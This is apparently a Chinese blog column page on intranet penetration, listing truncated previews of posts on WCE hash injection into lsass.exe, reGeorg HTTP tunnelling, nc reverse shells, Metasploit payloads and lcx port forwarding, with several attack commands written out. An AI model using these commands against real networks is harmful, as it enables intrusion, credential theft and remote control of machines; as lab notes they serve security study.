![](https://img-blog.csdnimg.cn/20201014180756724.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
内网渗透
weixin_42299610
请大佬指教!!!
展开
-
wce实现hash注入
原理:hash注入的原理是将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程lsass.exe中去,使得本地在使用ipc登录目标机器的时候就如同自己登录自己的机器一样获得权限。至于目标机器的本地或者是域用户hash如何取得那就要发挥你自己的想象力了,hash注入本身是为了对付那些破解不了的NTLM HASH。操作:1.先使用wce获取一台内网机器的hash值,太复杂无...原创 2020-03-29 21:53:13 · 763 阅读 · 0 评论 -
工具reGeorg(http隧道)
1.上传reGeorg里合适的tunnel到边缘服务器2.攻击机输入命令python reGeorgSocksProxy.py -u http://192.168.1.102/conn.aspx (上传地址)3.攻击机输入vim /etc/proxychains.conf ,按里面的说明进行设置proxychainssocks5 127.0.0.1 88884.使用proxycha...原创 2020-03-20 22:20:07 · 3069 阅读 · 0 评论 -
利用nc反弹shell实验
反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。利用nc正向连接shell实验步骤一:被控服务器shell反弹到本地的4444端口,并监听4444端口nc –lvp 44...原创 2020-03-19 17:08:45 · 1212 阅读 · 0 评论 -
metasploit-framework(MSF)工具的使用
初始化metasploit-frameworkmsfconsole查看payload模块show payloads使用payload:windows/x64/pingback_reverse_tcp,查看payload选项use windows/x64/pingback_reverse_tcpshow options另打开一个终端,制作windows/x64/pingbac...原创 2020-03-18 21:30:58 · 1086 阅读 · 1 评论 -
lcx实现端口转发
LCX转发实验一环境:内网3389端口不对外开放,但是1234端口对外开放(正向连接) lcx .exe –tran 1234 127.0.0.1 3389过程:192.168.1.105: 1234 -> 3389LCX转发实验二环境:内网主机可以访问外网80端口,同时3389端口只内网访问(反向连接)步骤一:外网服务器开启监听lcx.exe -listen 80 5...原创 2020-03-18 18:01:44 · 994 阅读 · 0 评论